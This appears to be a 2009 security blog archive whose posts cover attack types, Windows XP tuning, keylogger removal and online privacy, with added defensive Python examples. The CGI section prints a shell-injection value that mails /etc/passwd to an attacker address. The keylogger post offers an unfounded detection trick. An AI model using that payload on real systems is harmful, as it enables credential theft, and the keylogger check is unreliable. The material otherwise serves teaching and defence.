Sunday, October 25, 2009

Attack Types and Vulnerabilities

Introduction

There exist numerous ways to attack a target system. It could be achieved by exploiting known vulnerabilities in software or taking advantage of a badly configured security policy; it could be implemented remotely or internally. The techniques and methods used are likely to vary depending on the target and they should be chosen appropriately having assessed the situation fully. The attack types and vulnerabilities discussed in this module are:

1. Buffer Overflow attacks.

2. Denial of Service (DoS) attacks.

3. Distributed Denial of Service (DDoS) attacks.

4. Misconfigurations.

5. Abuse of Trust.

6. Brute force attacks.

7. CGI and WWW services.

8. Back doors and Trojans.


1. Buffer Overflow Attacks

These attacks exploit poorly written software to allow attackers to execute arbitrary code on the target system. Overflows can occur in server software which is available to users over the network, or in programs which exist on multi-user operating systems. In either case, a successful overflow allows the attacker to execute arbitrary code with the privileges of the vulnerable service. The most sought-after exploits in the hacker community are “remote root” exploits; however, they are not as common as local exploits. A local exploit targets a program that is not available over the network but is shared by the users of a multi-user operating system such as UNIX. This allows for the same escalation of privilege as that provided by remote exploits.

Example

If the sendmail daemon is running with root privileges and contains a buffer overflow, then commands executed via the overflow will provide the attacker with a means of executing commands as root.


2. Denial of Service (DoS) Attacks

Denial of Service or DoS attacks result in a specific service being made unavailable to legitimate users. These attacks typically have one of three targets:

• The network connection providing access to the service.

• The operating system hosting the service.

• The application level program providing the service.

The Network Connection Providing Access to the Service

By flooding the network with traffic, less bandwidth is left for use by the service. If the flood consumes enough bandwidth, legitimate users are effectively denied access to the service.

Example

A typical example of this is the Smurf attack, where data is sent to the broadcast address of a network, and the source address of the traffic is specified as that of the target machine. This results in all the systems on the network responding to the supposed source at the same time, thereby generating huge amounts of traffic.
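The Smurf pattern has two observable halves: echo requests arriving at a network's broadcast address from an outside source (the spoofed victim), and a flood of echo replies converging on that address. The following Python detector is an added example and not part of the original module; it classifies a constructed list of ICMP packets into those two signals. The 192.0.2.0/24 network and the 198.51.100.9 address are documentation-range values chosen for the example, and the defended network and the reply threshold are assumptions.

```python
import ipaddress
from collections import defaultdict

# Constructed example: the network we defend. An echo request addressed to its
# broadcast address from outside is the amplifier half of a Smurf attack.
LOCAL_NETS = [ipaddress.ip_network("192.0.2.0/24")]

ICMP_ECHO_REPLY = 0
ICMP_ECHO_REQUEST = 8


def is_directed_broadcast(dst):
    """True when dst is the broadcast address of one of our networks."""
    addr = ipaddress.ip_address(dst)
    return any(addr == net.broadcast_address for net in LOCAL_NETS)


def is_local(src):
    """True when src belongs to one of our networks."""
    addr = ipaddress.ip_address(src)
    return any(addr in net for net in LOCAL_NETS)


def analyse(packets, reply_threshold=50):
    """packets: iterable of (src, dst, icmp_type) tuples, already filtered to ICMP.

    Returns (amplifier_hits, victims):
      amplifier_hits - echo requests sent to our broadcast address by a source
                       outside the network (in a Smurf, the spoofed victim address)
      victims        - destinations receiving echo replies from at least
                       reply_threshold distinct hosts, i.e. the flooded target
    """
    amplifier_hits = []
    reply_sources = defaultdict(set)
    for src, dst, icmp_type in packets:
        if (icmp_type == ICMP_ECHO_REQUEST
                and is_directed_broadcast(dst) and not is_local(src)):
            amplifier_hits.append((src, dst))
        elif icmp_type == ICMP_ECHO_REPLY:
            reply_sources[dst].add(src)
    victims = {dst: len(srcs) for dst, srcs in reply_sources.items()
               if len(srcs) >= reply_threshold}
    return amplifier_hits, victims


def sample_capture():
    """Constructed packet list: three spoofed requests to the broadcast address,
    every host on the /24 answering the supposed source, and one ordinary ping."""
    victim = "198.51.100.9"
    packets = [(victim, "192.0.2.255", ICMP_ECHO_REQUEST) for _ in range(3)]
    packets += [(f"192.0.2.{i}", victim, ICMP_ECHO_REPLY) for i in range(1, 255)]
    packets.append(("192.0.2.10", "192.0.2.20", ICMP_ECHO_REQUEST))  # normal ping, ignored
    return packets


if __name__ == "__main__":
    hits, flooded = analyse(sample_capture())
    print("amplifier hits:", len(hits))
    print("flooded targets:", flooded)
```

The amplifier side is the one a network operator can actually close: routers that do not forward directed broadcasts, and hosts that do not answer broadcast pings, stop the network from being used to flood someone else.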

The Operating System Hosting the Service

Operating systems have been found to be vulnerable to denial of service attacks. In the case of network based attacks this is caused by the operating system's specific implementation of the networking stack. A bug in this stack can cause the entire operating system to hang or reboot when anomalous network traffic is encountered.

Example

A well known example is the Windows NT Out of Band (OOB) attack, which caused affected systems to produce the “blue screen of death” when sent specific IP packets. We can expect to see more vulnerable IP stacks appearing as the market focus shifts to embedded Internet-enabled devices, where each vendor uses its own implementation of the IP stack.

The Application Level Program Providing the Service

Network applications can be vulnerable to denial of service attacks in the same way that operating systems are. If no allowances are made for unexpected traffic or other input, the application could encounter a condition where it hangs, and can no longer provide the service it was designed for. Poor error handling in the code could lead to the same result. If the operating system does not take adequate precautions for extreme conditions, it could be vulnerable to an attack that attempts to exhaust the physical resources available on the system. Several such attacks have been released which push the CPU to 100 percent utilization, and thereby deny access to other services.


3. Distributed Denial of Service (DDoS) Attacks

Otherwise known as DDoS, these attacks have the same goal as standard Denial of Service attacks but use a different architecture to achieve it. A single host launching a network or application level attack against a target is constrained by its own available network bandwidth and system resources; a group of machines can be far more effective in a concerted attack. The DDoS programs currently available publicly all use the same basic architecture to control the attack, common examples being:

• Stacheldraht.

• TFN.

• TFN2K.

• Trinoo.

Installing DDoS Software

There is a relatively standard procedure that is followed when installing the DDoS software in preparation for an attack.

1. Previously compromised hosts have “zombie” agents installed on them.

2. Another compromised host has the master controlling software installed on it. This piece of software is configured to be aware of the location of all the agents.

3. The last step is to install client software on the attacker's machine, used to initiate the attack.

Initiating the Attack

The attack is typically initiated in the following manner:

1. The client communicates the IP addresses of the desired targets to the master system.

2. This master system then instructs each of the agents to launch an attack against the target using standard DoS techniques. Early detection of these systems was possible by scanning machines for the presence of agents and by sniffing network traffic to detect the communication between the master and the agents.

Evolution of DDoS

As the DDoS tools have evolved, they now incorporate encryption in the master-to-agent communication and allow agents to listen on UDP ports which only respond when sent a shared secret key. These two enhancements make detecting these systems remotely a very difficult task.


4. Misconfigurations

Although exploits feature heavily in security related news, far more successful attacks are conducted by abusing common misconfigurations in network services. Network services should always be configured with a “deny access by default” policy. The opposite is often the case, which results in a number of services being vulnerable to malicious attack. Weak access controls on network services often lead to further privilege escalation and eventual compromise of the system. This was illustrated by the recent successful attack on the Apache web site. The attackers exploited a poorly configured ftp server, which allowed write access to the web site. This in turn allowed them to run a script via the web and gain remote root access to the system. By default, certain products, such as Checkpoint's Firewall-1, are installed with settings that open them up to security vulnerabilities and have to be specifically reconfigured to ensure their secure operation.


5. Abuse of Trust

Early networking protocols did not place a lot of emphasis on encryption and authentication, as they were used in relatively small networks. As these networks and systems became part of the Internet, it became possible to exploit weaknesses in these protocols. An example is the use of a source IP address as the means of establishing a trust relationship between two systems. Common attacks exploit this weakness by spoofing the address of the trusted host and thereby gaining access to the trusting system and its resources. Typical examples are NFS and the “r” utilities (rsh, rlogin).


6. Brute Force Attacks

These attacks aim to gain access to a system by repeated attempts at authentication. Most services that require a username and password and have no facility for account lockout are vulnerable to this type of attack. Brute force methods are commonly used to crack password files, as this can be done reasonably quickly on a local system. Common tools used in this case are:

• Crack - A UNIX based program.

• L0phtcrack - A Windows based program.

Attacking network based services can be more time consuming as the response time will depend heavily on the network load. Tools exist to crack the following services:

• Telnet.

• ftp.

• Http.

• CGI logins.

To improve the chances of a successful brute force attack, one part of the two-part authentication (the username) is needed. This can be obtained from other network or system vulnerabilities, e.g. finger or null sessions, or by “dumpster diving” and other social engineering methods.

Dictionary Attack

Once a username has been established, it is expedient to first try a dictionary-based attack, which tries words from various dictionaries until a match is found. The dictionaries available vary in size and scope as well as subject. Themed dictionaries are available, such as Star Wars dictionaries, that can be used in conjunction with other information to produce a more targeted attack. Failing a dictionary attack, a true brute force method can be followed, which attempts every combination of characters from a known subset until a match is found. This can be very time-consuming if the subset is large or if the minimum password length is relatively long.
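Account lockout is the mitigation the text names; on the detection side, the same property (many failures against one account or from one source in a short window) is what a log monitor looks for. The following Python is an added example and not code from the original module. It parses constructed sshd-style syslog lines (the host, users and addresses are invented), flags a source once its failures within a sliding window reach a threshold, and separately records a successful login from an already flagged source, which is the event that most deserves a human's attention. The threshold, window and log format are assumptions.

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Constructed sample of sshd-style syslog lines (no real host, user or address).
SAMPLE_LOG = """\
Oct 25 10:00:01 host1 sshd[2001]: Failed password for alice from 203.0.113.5 port 51000 ssh2
Oct 25 10:00:03 host1 sshd[2002]: Failed password for alice from 203.0.113.5 port 51001 ssh2
Oct 25 10:00:04 host1 sshd[2003]: Failed password for invalid user admin from 203.0.113.5 port 51002 ssh2
Oct 25 10:00:06 host1 sshd[2004]: Failed password for alice from 203.0.113.5 port 51003 ssh2
Oct 25 10:00:08 host1 sshd[2005]: Failed password for alice from 203.0.113.5 port 51004 ssh2
Oct 25 10:00:09 host1 sshd[2006]: Accepted password for alice from 203.0.113.5 port 51005 ssh2
Oct 25 10:02:30 host1 sshd[2007]: Failed password for bob from 198.51.100.7 port 40000 ssh2
Oct 25 10:02:45 host1 sshd[2008]: Accepted password for bob from 198.51.100.7 port 40001 ssh2
"""

LINE_RE = re.compile(
    r"^(?P<ts>\w{3} \d{2} \d{2}:\d{2}:\d{2}) \S+ sshd\[\d+\]: "
    r"(?P<result>Failed|Accepted) password for (?:invalid user )?(?P<user>\S+) "
    r"from (?P<src>\S+) port \d+"
)
LOG_YEAR = 2009  # syslog omits the year; assumed for the constructed sample


def parse_line(line):
    """Return (timestamp, result, user, src) or None for lines we do not understand."""
    m = LINE_RE.match(line)
    if not m:
        return None
    ts = datetime.strptime(m["ts"], "%b %d %H:%M:%S").replace(year=LOG_YEAR)
    return ts, m["result"], m["user"], m["src"]


def detect_brute_force(lines, threshold=5, window=timedelta(minutes=5)):
    """Flag sources with >= threshold failures inside a sliding window.

    Returns (flagged, guessed): flagged maps a source to the sorted usernames it
    tried; guessed lists (src, user) for logins accepted from a flagged source.
    """
    failures = defaultdict(deque)   # src -> timestamps of failures still in the window
    users_seen = defaultdict(set)   # src -> usernames it has failed against
    flagged = set()
    guessed = []
    for line in lines:
        parsed = parse_line(line)
        if parsed is None:
            continue
        ts, result, user, src = parsed
        if result == "Failed":
            users_seen[src].add(user)
            recent = failures[src]
            recent.append(ts)
            # Drop failures that have aged out of the window (the newest entry
            # is ts itself, so the deque never empties here).
            while ts - recent[0] > window:
                recent.popleft()
            if len(recent) >= threshold:
                flagged.add(src)
        elif src in flagged:
            # A success right after a burst of failures is the signature of a
            # guessed password, not of a forgetful user.
            guessed.append((src, user))
    return {src: sorted(users_seen[src]) for src in flagged}, guessed


def run_sample():
    return detect_brute_force(SAMPLE_LOG.splitlines())


if __name__ == "__main__":
    flagged, guessed = run_sample()
    print("flagged sources:", flagged)
    print("accepted after flagging:", guessed)
```

The per-source window is what lockout-free services lack: the same counters, kept by the service itself and tied to the account as well as the source, are the account lockout the text recommends.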


7. CGI and WWW Services

As more websites offer interactive services, more CGI and web based vulnerabilities are being uncovered. CGI vulnerabilities fall into three categories:

• Buffer overflow.

• Command execution.

• Subverting client side scripting.

Buffer Overflow

Standard buffer overflow techniques can be applied to CGI scripts. Since scripts accept user input, this input can be used to overflow buffers in vulnerable programs. This only affects scripts written in relatively low-level languages such as C. Scripts should always validate all user input, and internal functions should sanity-check the size of buffers. Higher-level and more commonly used scripting languages perform bounds checking on variable and array lengths internally and are consequently not vulnerable to buffer overflow attacks. Examples of such languages are:

• Java.

• Perl.

• Python.

Command Execution

Scripts written in higher-level languages sometimes contain more insidious vulnerabilities than their low-level cousins. A common example is command execution on the remote machine, once again caused by poor input validation. For example, CGI scripts sometimes contain code that executes shell commands, such as the Perl statement:

system("mail $email < document.txt");   # document.txt stands for the file being mailed; $email comes straight from the web form

This is a simple way of mailing a document to a user. In this example the $email variable contains an email address that was entered in a form on the website. If no input validation is done when the user enters her email address, it is possible to embed shell commands in the input field and have them executed by the system call:

hacker@hack.net < /etc/passwd;

Inserting the above value will cause the password file to be mailed to the attacker. As with buffer overflow attacks, the level of privilege with which these commands are executed depends on the privilege level of the CGI script.

Subverting Client Side Scripting

Client-side scripting in the form of JavaScript or VBScript is sometimes used to perform input validation. This has the advantage that the user is notified immediately when incorrect data is entered, and doesn’t have to wait for the form to be submitted before receiving feedback. Input validation done at this level presents serious security flaws, as the client-side source code is available to, and editable by, the end user. By simply removing the restrictions on character sets and input length, buffer overflow and command execution attacks can then be attempted. Client-side input validation should always be used as an addition to server-side validation and should not be considered a replacement. Very poorly written client-side scripts sometimes contain usernames and passwords which can be used to gain access to the system.
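The command execution example above and the point about client-side validation share one server-side fix: check the address against an allowlist on the server, and never hand it to a shell. The Python below is an added example and not code from the original module; it places the article's Perl pattern, translated, next to a hardened version. The EMAIL_RE pattern, the report.txt file name and the use of the local mail command are assumptions made for the example.

```python
import re
import subprocess

# Allowlist of what a mail address may contain. A hypothetical policy for this
# example; the point is that anything outside it (spaces, '<', ';', newlines)
# is rejected before the address goes anywhere near a command.
EMAIL_RE = re.compile(r"[A-Za-z0-9._%+-]+@[A-Za-z0-9-]+(\.[A-Za-z0-9-]+)+")


def is_valid_email(email):
    # fullmatch: the whole string must fit the pattern, no trailing junk.
    return EMAIL_RE.fullmatch(email) is not None


def vulnerable_mail_command(email, document):
    """The article's pattern: the untrusted address is spliced into a shell
    command string. Returned rather than executed so it can be inspected."""
    return f"mail {email} < {document}"


def safe_mail_argv(email):
    """Server-side validation plus no shell: the address becomes a single argv
    element, so shell metacharacters in it are never interpreted."""
    if not is_valid_email(email):
        raise ValueError("rejected e-mail address")
    return ["mail", email]


def send_document(email, document):
    """Mail a file to a validated address without involving a shell."""
    argv = safe_mail_argv(email)
    with open(document, "rb") as fh:
        # Python performs the redirection that the shell did in the original;
        # subprocess.run with a list and shell=False never parses the address.
        return subprocess.run(argv, stdin=fh, check=False).returncode


def demo():
    """Compare the two forms on a normal address and on the article's payload."""
    normal = "user@example.com"
    payload = "hacker@hack.net < /etc/passwd;"   # the injection string from the text
    results = {"normal_ok": safe_mail_argv(normal) == ["mail", normal]}
    try:
        safe_mail_argv(payload)
        results["payload_rejected"] = False
    except ValueError:
        results["payload_rejected"] = True
    # What the vulnerable form would have handed to /bin/sh:
    results["vulnerable_string"] = vulnerable_mail_command(payload, "report.txt")
    return results


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value}")
```

Whatever the JavaScript on the form checks, `is_valid_email` is the check that counts: the browser's copy of the rules can be edited away, the server's cannot.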


8. Backdoors and Trojans

Trojans and backdoor programs are becoming an increasingly popular method of gaining unauthorized access to remote systems. Backdoors offer the attacker an easy way of accessing a remote system without having to rely on exploits or other security vulnerabilities. The simplest backdoors take the form of command shells listening on unusual ports. A commonly used tool is NetCat, which is available on both the Windows and UNIX platforms. Once NetCat is installed and listening on port XXXX, the attacker need only telnet to port XXXX to be presented with a remote command shell.

Backdoor and Trojan Development

As intrusion detection and firewall technologies have improved, so have the backdoor programs. The simple TCP based remote shell utilities have been superseded by UDP and ICMP based programs that support encrypted data channels. The ability to control these backdoors with UDP packets allows them to be deployed behind firewalls that allow UDP traffic, typically for DNS on port 53. Similarly, if the firewall in question allows ICMP packets through, these can be used to communicate with the backdoor programs. The use of encrypted data channels means that intrusion detection software can no longer inspect the packet data for signatures, making detection of these backdoors even more difficult.

Deployment

Backdoors can also be deployed on “virgin” systems without first compromising them through other means. This can be accomplished by embedding the backdoor in an email attachment, an ActiveX control or a file on the Internet. Utilities such as Silkrope and Saranwrap exist which allow the attacker to attach the Trojan to a seemingly legitimate file. Well-known backdoor programs on the Microsoft Windows platform include:

• BackOrifice.

• NetBus.

Sunday, August 23, 2009

23 Ways To Speed Windows XP, Not only Disk Defragmenter

Since Disk Defragmenter won't do much to improve Windows XP performance, here are 23 suggestions that will. Each can enhance the performance and reliability of your customers' PCs. Best of all, most of them will cost you nothing.

1.) To decrease a system's boot time and increase system performance, use the money you save by not buying defragmentation software -- the built-in Windows defragmenter works just fine -- and instead equip the computer with an Ultra-133 or Serial ATA hard drive with 8-MB cache buffer.

2.) If a PC has less than 512 MB of RAM, add more memory. This is a relatively inexpensive and easy upgrade that can dramatically improve system performance.

3.) Ensure that Windows XP is utilizing the NTFS file system. If you're not sure, here's how to check: First, double-click the My Computer icon, right-click on the C: Drive, then select Properties. Next, examine the File System type; if it says FAT32, then back up any important data. Next, click Start, click Run, type CMD, and then click OK. At the prompt, type CONVERT C: /FS:NTFS and press the Enter key. This process may take a while; it's important that the computer be uninterrupted and virus-free. The file system used by the bootable drive will be either FAT32 or NTFS. I highly recommend NTFS for its superior security, reliability, and efficiency with larger disk drives.

4.) Disable file indexing. The indexing service extracts information from documents and other files on the hard drive and creates a "searchable keyword index." As you can imagine, this process can be quite taxing on any system.

The idea is that the user can search for a word, phrase, or property inside a document, should they have hundreds or thousands of documents and not know the file name of the document they want. Windows XP's built-in search functionality can still perform these kinds of searches without the Indexing service. It just takes longer. The OS has to open each file at the time of the request to help find what the user is looking for.

Most people never need this feature of search. Those who do are typically in a large corporate environment where thousands of documents are located on at least one server. But if you're a typical system builder, most of your clients are small and medium businesses. And if your clients have no need for this search feature, I recommend disabling it.

Here's how: First, double-click the My Computer icon. Next, right-click on the C: Drive, then select Properties. Uncheck "Allow Indexing Service to index this disk for fast file searching." Next, apply changes to "C: subfolders and files," and click OK. If a warning or error message appears (such as "Access is denied"), click the Ignore All button.

5.) Update the PC's video and motherboard chipset drivers. Also, update and configure the BIOS. For more information on how to configure your BIOS properly, see this article on my site.

6.) Empty the Windows Prefetch folder every three months or so. Windows XP can "prefetch" portions of data and applications that are used frequently. This makes processes appear to load faster when called upon by the user. That's fine. But over time, the prefetch folder may become overloaded with references to files and applications no longer in use. When that happens, Windows XP is wasting time, and slowing system performance, by pre-loading them. Nothing critical is in this folder, and the entire contents are safe to delete.

7.) Once a month, run a disk cleanup. Here's how: Double-click the My Computer icon. Then right-click on the C: drive and select Properties. Click the Disk Cleanup button -- it's just to the right of the Capacity pie graph -- and delete all temporary files.

8.) In your Device Manager, double-click on the IDE ATA/ATAPI Controllers device, and ensure that DMA is enabled for each drive you have connected to the Primary and Secondary controller. Do this by double-clicking on Primary IDE Channel. Then click the Advanced Settings tab. Ensure the Transfer Mode is set to "DMA if available" for both Device 0 and Device 1. Then repeat this process with the Secondary IDE Channel.

9.) Upgrade the cabling. As hard-drive technology improves, the cabling requirements to achieve these performance boosts have become more stringent. Be sure to use 80-wire Ultra-133 cables on all of your IDE devices with the connectors properly assigned to the matching Master/Slave/Motherboard sockets. A single device must be at the end of the cable; connecting a single drive to the middle connector on a ribbon cable will cause signaling problems. With Ultra DMA hard drives, these signaling problems will prevent the drive from performing at its maximum potential. Also, because these cables inherently support "cable select," the location of each drive on the cable is important. For these reasons, the cable is designed so drive positioning is explicitly clear.

10.) Remove all spyware from the computer. Use free programs such as AdAware by Lavasoft or SpyBot Search & Destroy. Once these programs are installed, be sure to check for and download any updates before starting your search. Anything either program finds can be safely removed. Any free software that requires spyware to run will no longer function once the spyware portion has been removed; if your customer really wants the program even though it contains spyware, simply reinstall it. For more information on removing Spyware visit this Web Pro News page.

11.) Remove any unnecessary programs and/or items from Windows Startup routine using the MSCONFIG utility. Here's how: First, click Start, click Run, type MSCONFIG, and click OK. Click the StartUp tab, then uncheck any items you don't want to start when Windows starts. Unsure what some items are? Visit the WinTasks Process Library. It contains known system processes, applications, as well as spyware references and explanations. Or quickly identify them by searching for the filenames using Google or another Web search engine.

12.) Remove any unnecessary or unused programs from the Add/Remove Programs section of the Control Panel.

13.) Turn off any and all unnecessary animations, and disable active desktop. In fact, for optimal performance, turn off all animations. Windows XP offers many different settings in this area. Here's how to do it: First click on the System icon in the Control Panel. Next, click on the Advanced tab. Select the Settings button located under Performance. Feel free to play around with the options offered here, as nothing you can change will alter the reliability of the computer -- only its responsiveness.

14.) If your customer is an advanced user who is comfortable editing their registry, try some of the performance registry tweaks offered at Tweak XP.

15.) Visit Microsoft's Windows update site regularly, and download all updates labeled Critical. Download any optional updates at your discretion.

16.) Update the customer's anti-virus software on a weekly, even daily, basis. Make sure they have only one anti-virus software package installed. Mixing anti-virus software is a sure way to spell disaster for performance and reliability.

17.) Make sure the customer has fewer than 500 type fonts installed on their computer. The more fonts they have, the slower the system will become. While Windows XP handles fonts much more efficiently than did the previous versions of Windows, too many fonts -- that is, anything over 500 -- will noticeably tax the system.

18.) Do not partition the hard drive. Windows XP's NTFS file system runs more efficiently on one large partition. The data is no safer on a separate partition, and a reformat is never necessary to reinstall an operating system. The same excuses people offer for using partitions apply to using a folder instead. For example, instead of putting all your data on the D: drive, put it in a folder called "D drive." You'll achieve the same organizational benefits that a separate partition offers, but without the degradation in system performance. Also, your free space won't be limited by the size of the partition; instead, it will be limited by the size of the entire hard drive. This means you won't need to resize any partitions, ever. That task can be time-consuming and also can result in lost data.

19.) Check the system's RAM to ensure it is operating properly. I recommend using a free program called MemTest86. The download will make a bootable CD or diskette (your choice), which will run 10 extensive tests on the PC's memory automatically after you boot to the disk you created. Allow all tests to run until at least three passes of the 10 tests are completed. If the program encounters any errors, turn off and unplug the computer, remove a stick of memory (assuming you have more than one), and run the test again. Remember, bad memory cannot be repaired, but only replaced.

20.) If the PC has a CD or DVD recorder, check the drive manufacturer's Web site for updated firmware. In some cases you'll be able to upgrade the recorder to a faster speed. Best of all, it's free.

21.) Disable unnecessary services. Windows XP loads a lot of services that your customer most likely does not need. To determine which services you can disable for your client, visit the Black Viper site for Windows XP configurations.

22.) If you're sick of a single Windows Explorer window crashing and then taking the rest of your OS down with it, then follow this tip: open My Computer, click on Tools, then Folder Options. Now click on the View tab. Scroll down to "Launch folder windows in a separate process," and enable this option. You'll have to reboot your machine for this option to take effect.

23.) At least once a year, open the computer's case and blow out all the dust and debris. While you're in there, check that all the fans are turning properly. Also inspect the motherboard capacitors for bulging or leaks. For more information on this leaking-capacitor phenomenon, you can read numerous articles on my site.


Following any of these suggestions should result in noticeable improvements to the performance and reliability of your customers' computers. If you still want to defrag a disk, remember that the main benefit will be to make your data more retrievable in the event of a crashed drive.

Tuesday, May 5, 2009

How to check and remove Keyloggers in your computer

What is Keylogger?
A keylogger is something that records the keystrokes made on a computer. All keys pressed on the keyboard are stored in a file and sent to the e-mail address of the person doing the monitoring. This means that the person monitoring the keylogger will know everything you do on your computer, and will also have your logins and passwords.

A keylogger can be software, which can infect your system in the same way as spyware or a Trojan, by being attached to an e-mail or to software you download. A keylogger can also be hardware, connected between your keyboard connector and the keyboard port on your computer.

What is a keylogger used for?
A keylogger has many uses. The keylogger silently records all keystrokes typed, including emails, word documents, chat-room activity, IRC, instant messages, web addresses and web searching.


Many companies use keyloggers on their company PCs to supervise employees for Internet and PC usage compliance. Keyloggers can help keep track of activity and allow a company to act on unauthorised activity before it is too late. But hackers use keyloggers to capture a targeted person's activities and obtain information such as bank account details, e-mail passwords, and system logins and passwords.

How to remove Keylogger?
You can try one of the methods below to check whether there is a keylogger on your computer:
1. Ctrl+Alt+Shift + different keys on the keyboard.
2. Ctrl+Alt+Del + different keys on the keyboard.
If a pop-up appears and asks for a password, it means you have a keylogger on your computer.

Recommended tools to remove Keyloggers
PSMAntiKeyLogger - Real-time protection software that protects you against keyloggers. No scanning is needed.

SnoopFree - Freeware anti-keylogger that blocks hook-based keyloggers as well as screen captures. For Windows XP.

I Hate Keyloggers - Freeware anti-keylogger that blocks hook-based keyloggers. For Windows 2000 and XP.

KL-Detector - Freeware on demand keylogger scanner.

There are many tools for this; you can search for them on www.google.com using keywords like “Keylogger remover” or “how to remove keylogger”.

Friday, May 1, 2009

3. How to Protect Your Privacy When Using the Internet

Privacy is the ability to control when, how, and to whom your personal information is given. Privacy is power. Losing your privacy means losing personal power. This section offers tips and technical advice to help you protect your privacy when using the Internet. It applies whether you use Windows or some other operating system, like Linux or Apple's Mac OS. Web privacy is a fast-moving area in which technologies and laws are in flux. This guide can no more guarantee you absolute privacy than it can guarantee you a completely secure Windows. But if you follow our tips you'll minimize your privacy exposure.

3.1 Limit the Personal Information You Give Out

Before entering personal information into a web site form, a social network, or a forum, read the site's Privacy Policy and Terms of Use. If they're legalistic and hard-to-read, chances are they have more to do with harvesting your personal data than protecting it. Many agreements are written so that they can be changed at any time. This makes any assurance of protection for your personal data worthless because the web site could simply change the agreement after you've provided the information. Some agreements even include fine print by which you agree to the installation of malware on your computer!

Few privacy policies guarantee that information will be destroyed as it ages. Once given out, information tends to live forever. Few privacy policies give you any legal rights if your information is lost or stolen. In 2007 alone, over 162 million personal records were reported lost or stolen in the United States. (Yet it remains legal for companies to buy and sell your social security number and personal data.)

Once you post personal information on the web, you lose control over how that information is used. Changes to the "context" in which that data is used can harm you. An example is the information students enter into social web sites like MySpace or Facebook for their friends' amusement, only to find it resurfacing later to harm their employment opportunities or their careers. Both sites offer privacy controls that easily allow individuals to avoid such consequences -- but most users don't apply them.

The selling of personal data is a multibillion dollar, largely-unregulated business in the United States. It's an entire industry called information brokering.

People who give out their personal data expose themselves to manipulation or worse. Even the U.S. government is researching the harvesting of personal data from social networking sites for public surveillance. And why not? People voluntarily post the information. Fans of social networking will consider these cautions anachronistic. Please read how people expose themselves to manipulation or harm by posting personal data, found in authoritative books such as The Digital Person, The Soft Cage, or The Future of Reputation: Gossip, Rumor, and Privacy on the Internet.

We need government regulation to enforce minimal rights for social network users, much the way we have consumer-protection legislation for credit cards. Meanwhile, protect yourself by educating yourself. Tiny bits of information can be collected and compiled by web computers into comprehensive profiles. If an organization can collect enough small bits of information -- for example, just the names of all the web sites you visit -- it can eventually develop a complete picture of who you are, what you do, how you live, and what you believe. Privacy is power. You give away your personal power when you give out personal information. You assume risk you cannot measure at the time you assume it.

3.2 Don't Let Web Sites Track You

Cookies are small files that web sites store on your computer's disk. They allow web sites to store information about your interaction with them. For example, they might store the data required for you to purchase items across the several web pages this involves. However, cookies -- originally called tracking cookies -- can also be used to track your movement across the web. Depending on the software using them, this data could be used to create a detailed record of your behavior as you surf. The resulting profile might be used for innocuous purposes, such as targeted marketing, or for malicious reasons, like spying.

Most browsers accept cookies by default. To retain your privacy, set the browser not to accept any cookies other than exceptions you specify. Then only web sites you approve can set cookies on your computer. A few web sites won't let you interact with them unless you accept their cookies -- but most will. You can also set most browsers to automatically delete all cookies when you exit. This allows web sites to set the cookies required for transactions like purchasing through the web but prevents tracking you across sessions. To manage cookie settings in your browser, access these panels:

To turn cookies on or off --
  Internet Explorer:  Tools | Internet Options | Privacy | Advanced
  Firefox (version 2 on):  Tools | Options | Privacy | Cookies
  Opera:  Tools | Quick Preferences | Enable Cookies
  K-Meleon:  Tools | Privacy | Block Cookies
  SeaMonkey:  Edit | Preferences | Privacy & Security | Cookies

To allow specific web sites to set cookies --
  Internet Explorer:  Tools | Internet Options | Privacy | Edit
  Firefox:  Tools | Options | Privacy | Cookies | Exceptions
  Opera:  Tools | Preferences | Advanced | Cookies | Manage cookies
  K-Meleon:  Edit | Preferences | Privacy
  SeaMonkey:  Tools | Cookie Manager

To "clear" (erase) all cookies currently on your computer for the specified browser --
  Internet Explorer:  Tools | Internet Options | General | Delete Cookies
  Firefox:  Tools | Clear Private Data
  Opera:  Tools | Preferences | Advanced | Cookies
  K-Meleon:  Tools | Privacy | Clear Cookies
  SeaMonkey:  Tools | Cookie Manager | Manage Stored Cookies | Remove All Cookies

To automatically clear all cookies whenever you exit the browser --
  Internet Explorer:  Not available
  Firefox:  Tools | Options | Privacy | Cookies | Settings...
  Opera:  Tools | Preferences | Advanced | Cookies
  K-Meleon:  Tools | Privacy | Settings...
  SeaMonkey:  Not available

CookieCentral has more information about cookies and how to manage them. Other tracking mechanisms include web bugs, Flash cookies, and third-party local shared objects. These are less common than cookies and rather technical, so follow the links and see the Appendix if they concern you.
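The cross-site tracking described above, and the effect of the "allow specific web sites to set cookies" setting, can be reproduced with Python's standard http.cookiejar. This is an added example, not part of the original guide; the domains (shop.example, news.example, tracker.example) and cookie values are made up for the demonstration.

```python
"""Added example: a tracker pixel embedded in two unrelated sites links your
visits through one cookie, unless the browser only accepts cookies from sites
you have approved. All hostnames and cookie values below are constructed."""
import http.cookiejar
import urllib.request
from email.message import Message


class FakeResponse:
    """Minimal stand-in for an HTTP response; CookieJar only calls .info()."""
    def __init__(self, set_cookie_values):
        self._headers = Message()
        for value in set_cookie_values:
            self._headers.add_header("Set-Cookie", value)

    def info(self):
        return self._headers


def pixel_request(page):
    # The tracker image is embedded in `page`, so the browser treats this
    # as a third-party request originating from that page.
    return urllib.request.Request("http://tracker.example/pixel.gif",
                                  origin_req_host=page, unverifiable=True)


def browse(jar):
    """Visit two unrelated sites that both embed the same tracker pixel.
    Returns the Cookie header the tracker receives from each page
    (None means the browser sent it nothing)."""
    seen = {}
    for page, site_cookie in (("shop.example", "cart=abc123"),
                              ("news.example", "pref=dark")):
        # First-party cookie set by the page itself.
        jar.extract_cookies(FakeResponse([site_cookie]),
                            urllib.request.Request(f"http://{page}/"))
        # The browser fetches the pixel, sending any tracker cookie it holds...
        req = pixel_request(page)
        jar.add_cookie_header(req)
        seen[page] = req.get_header("Cookie")
        # ...and the tracker (re)sets its visitor identifier.
        jar.extract_cookies(FakeResponse(["uid=7f3e"]), req)
    return seen


def accept_all():
    """Browser default: every site, including the tracker, may set cookies."""
    return browse(http.cookiejar.CookieJar(http.cookiejar.DefaultCookiePolicy()))


def approved_sites_only():
    """Only the two sites you approved may set cookies; the tracker is refused."""
    policy = http.cookiejar.DefaultCookiePolicy(
        allowed_domains=["shop.example", "news.example"])
    return browse(http.cookiejar.CookieJar(policy))
```

With the default policy the tracker sees `uid=7f3e` again on the news.example visit and can join the two visits into one profile; with the exceptions policy it never receives a cookie, while the shopping cart cookie still works.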

3.3 Email Privacy

